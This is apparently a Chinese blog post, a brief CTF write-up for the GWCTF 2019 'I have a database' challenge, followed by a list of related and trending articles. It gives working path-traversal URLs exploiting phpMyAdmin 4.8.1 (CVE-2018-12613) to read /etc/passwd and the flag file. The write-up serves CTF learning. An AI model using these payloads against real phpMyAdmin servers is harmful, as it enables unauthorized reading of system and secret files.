[GWCTF 2019]我有一个数据库

双层小牛堡2023-09-12 23:45

过来毛都没有

直接dirsearch 扫一下

发现存在 phpadmin 我们直接访问一下

啥都没有 但是给我们了 phpadmin的版本

我们去搜搜看是否存在漏洞

phpMyAdmin 4.8.1后台文件包含漏洞(CVE-2018-12613)_phpmyadmin cve-2018-12613漏洞获取webshell_zhang三的博客-CSDN博客

发现还真有 我们直接复现即可

复制代码 
/phpmyadmin/index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd
复制代码 
phpmyadmin/index.php?target=db_sql.php%253f/../../../../../../../../flag
相关推荐
lingggggaaaa3 小时前
小迪安全v2023学习笔记(一百三十四讲)—— Windows权限提升篇&数据库篇&MySQL&MSSQL&Oracle&自动化项目
java·数据库·windows·笔记·学习·安全·网络安全
FreeBuf_5 小时前
Spring两大漏洞可导致泄露敏感信息及安全防护绕过(CVE-2025-41253/41254)
java·安全·spring
南一Nanyi6 小时前
才知道 DNS 还能基于 HTTPS 实现!
网络协议·安全·面试
Bruce_Liuxiaowei7 小时前
Win7虚拟机加入域错误排查指南:解决无法启动服务问题
运维·网络·windows·安全·网络安全
申耀的科技观察8 小时前
【观察】Cyber Resilience网络弹性筑基,主动防御铸盾,戴尔科技重构企业安全防护体系
网络·科技·安全·重构
kali-Myon12 小时前
NewStarCTF2025-Week1-Misc
安全·ctf·misc
数字供应链安全产品选型18 小时前
国家级!悬镜安全入选两项“网络安全国家标准应用实践案例”
人工智能·安全·web安全
鹿鸣天涯1 天前
商用密码应用安全性评估
网络·安全·web安全
骥龙1 天前
2.5、物联网设备的“免疫系统”:深入解析安全启动与可信执行环境
物联网·安全
jieyu11191 天前
xxe靶场通关
安全·web安全
热门推荐
01BongoCat - 跨平台键盘猫动画工具02GitHub 镜像站点03UV安装并设置国内源04Linux下V2Ray安装配置指南05两千字总结:Codex 国内如何安装和使用的教程,以及如何设置中文回答06KGG转MP3工具|非KGM文件|解密音频07GitLab 零基础入门指南:从安装到项目管理全流程08荣耀手机2025年10月发布的新品Magic8比起Magic7,在硬件、性能、价格等上有什么区别,有什么优势09windows找不到gpedit.msc(本地组策略编辑器)10NVIDIA显卡驱动、CUDA、cuDNN 和 TensorRT 版本匹配指南